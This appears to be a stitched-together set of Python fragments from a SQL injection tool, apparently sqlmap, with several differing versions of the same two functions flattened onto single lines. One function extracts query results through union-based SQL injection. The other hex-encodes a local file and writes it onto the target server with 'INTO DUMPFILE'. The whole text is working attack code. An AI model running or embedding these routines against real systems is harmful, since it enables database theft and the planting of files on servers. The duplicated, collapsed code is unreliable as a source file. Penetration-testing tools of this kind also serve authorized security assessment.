def unionWriteFile(self, wFile, dFile, fileType, confirm=True): logger.debug("encoding file to its hexadecimal string value") fcEncodedList = self.fileEncode(wFile, "hex", True) fcEncodedStr = fcEncodedList[0] fcEncodedStrLen = len(fcEncodedStr) if kb.injPlace == "GET" and fcEncodedStrLen > 8000: warnMsg = "the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" logger.warn(warnMsg) unionTest() oldParamFalseCond = conf.paramFalseCond conf.paramFalseCond = True debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) logger.debug(debugMsg) sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) unionUse(sqlQuery, direct=True, unescape=False, nullChar="''") conf.paramFalseCond = oldParamFalseCond if confirm: self.askCheckWrittenFile(wFile, dFile, fileType)
def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False): """ Retrieve the output of a SQL query taking advantage of an inband SQL injection vulnerability on the affected parameter. """ output = None partial = False data = [] if resumeValue: output = resume(expression, None) if not output or (output and (expected == EXPECTED.INT and not output.isdigit())): partial = True if output is None: output = unionUse(expression, unpack=unpack, dump=dump) if output: data = parseUnionPage(output, expression, partial, None, sort) return data
def __goInband(expression, expected=None): """ Retrieve the output of a SQL query taking advantage of an inband SQL injection vulnerability on the affected parameter. """ output = None partial = False data = [] condition = ( kb.resumedQueries and conf.url in kb.resumedQueries.keys() and expression in kb.resumedQueries[conf.url].keys() ) if condition: output = resume(expression, None) if not output or ( expected == "int" and not output.isdigit() ): partial = True if not output: output = unionUse(expression, resetCounter=True) if output: data = parseUnionPage(output, expression, partial, condition) return data
def __goInband(expression, expected=None): """ Retrieve the output of a SQL query taking advantage of an inband SQL injection vulnerability on the affected parameter. """ output = None partial = False data = [] condition = (kb.resumedQueries and conf.url in kb.resumedQueries.keys() and expression in kb.resumedQueries[conf.url].keys()) if condition: output = resume(expression, None) if not output or (expected == "int" and not output.isdigit()): partial = True if not output: output = unionUse(expression, resetCounter=True) if output: data = parseUnionPage(output, expression, partial, condition) return data
def unionWriteFile(self, wFile, dFile, fileType, confirm=True): logger.debug("encoding file to its hexadecimal string value") fcEncodedList = self.fileEncode(wFile, "hex", True) fcEncodedStr = fcEncodedList[0] fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: warnMsg = "the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" logger.warn(warnMsg) debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) logger.debug(debugMsg) sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) unionUse(sqlQuery, unpack=False) if confirm: self.askCheckWrittenFile(wFile, dFile, fileType)